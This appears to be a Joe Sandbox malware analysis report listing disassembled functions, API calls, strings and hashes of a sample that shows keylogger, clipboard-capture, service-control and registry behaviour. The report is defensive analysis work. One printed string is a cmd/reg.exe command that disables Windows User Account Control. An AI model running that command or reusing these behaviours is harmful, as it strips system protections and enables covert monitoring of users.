                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                              • String ID:
                              • API String ID: 493672254-0
                              • Opcode ID: 5793459f2b05a341084337c73a07c815787686c6c1611b41556a500e88ced60e
                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                              • Opcode Fuzzy Hash: 5793459f2b05a341084337c73a07c815787686c6c1611b41556a500e88ced60e
                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                              Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                              • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                              Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                              • _free.LIBCMT ref: 00446EF6
                              • _free.LIBCMT ref: 00446F1E
                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                              • _abort.LIBCMT ref: 00446F3D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$_abort
                              • String ID:
                              • API String ID: 3160817290-0
                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                              Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 5e98436304e62fec6e515a5957ef56b7dffb99f2b3dd76da12d6ba2fed702406
                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                              • Opcode Fuzzy Hash: 5e98436304e62fec6e515a5957ef56b7dffb99f2b3dd76da12d6ba2fed702406
                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                              Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 91e0008218e0c7c995c924fae4d26e1d77b9d6fdfbd6be204ccbe7d00a4f3a0e
                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                              • Opcode Fuzzy Hash: 91e0008218e0c7c995c924fae4d26e1d77b9d6fdfbd6be204ccbe7d00a4f3a0e
                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                              Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 00e877085fbe49e6d0340a997bb4557ed5df32502caa88c91b70e44b83d324dd
                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                              • Opcode Fuzzy Hash: 00e877085fbe49e6d0340a997bb4557ed5df32502caa88c91b70e44b83d324dd
                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                              Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Enum$InfoQueryValue
                              • String ID: [regsplt]$DG
                              • API String ID: 3554306468-1089238109
                              • Opcode ID: 3f7698b5142b9873052bacf43db5521a53273f77a33e8e4bcdd6c6336b8cbdf4
                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                              • Opcode Fuzzy Hash: 3f7698b5142b9873052bacf43db5521a53273f77a33e8e4bcdd6c6336b8cbdf4
                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                              Function 004426D4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000104), ref: 00442714
                              • _free.LIBCMT ref: 004427DF
                              • _free.LIBCMT ref: 004427E9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$FileModuleName
                              • String ID: @)\$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                              • API String ID: 2506810119-1628672718
                              • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                              • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                              Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                              • API String ID: 2974294136-753205382
                              • Opcode ID: 65db5e6ba34dbd168fe00558d70a1d929f1ffaa6cb32c497ca20c7c17160d0b3
                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                              • Opcode Fuzzy Hash: 65db5e6ba34dbd168fe00558d70a1d929f1ffaa6cb32c497ca20c7c17160d0b3
                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                              Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • wsprintfW.USER32 ref: 0040A905
                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: EventLocalTimewsprintf
                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                              • API String ID: 1497725170-248792730
                              • Opcode ID: aac721caecb394176a154b2374b0fdf620af402c3856e35041706e17cb35748e
                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                              • Opcode Fuzzy Hash: aac721caecb394176a154b2374b0fdf620af402c3856e35041706e17cb35748e
                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                              Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSizeSleep
                              • String ID: x~^
                              • API String ID: 1958988193-2563557489
                              • Opcode ID: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                              • Opcode Fuzzy Hash: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                              Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                              • GetLastError.KERNEL32 ref: 0041CA91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                              Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                              • CloseHandle.KERNEL32(?), ref: 00406A14
                              Strings
                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                              • API String ID: 2922976086-4183131282
                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                              Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                              Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
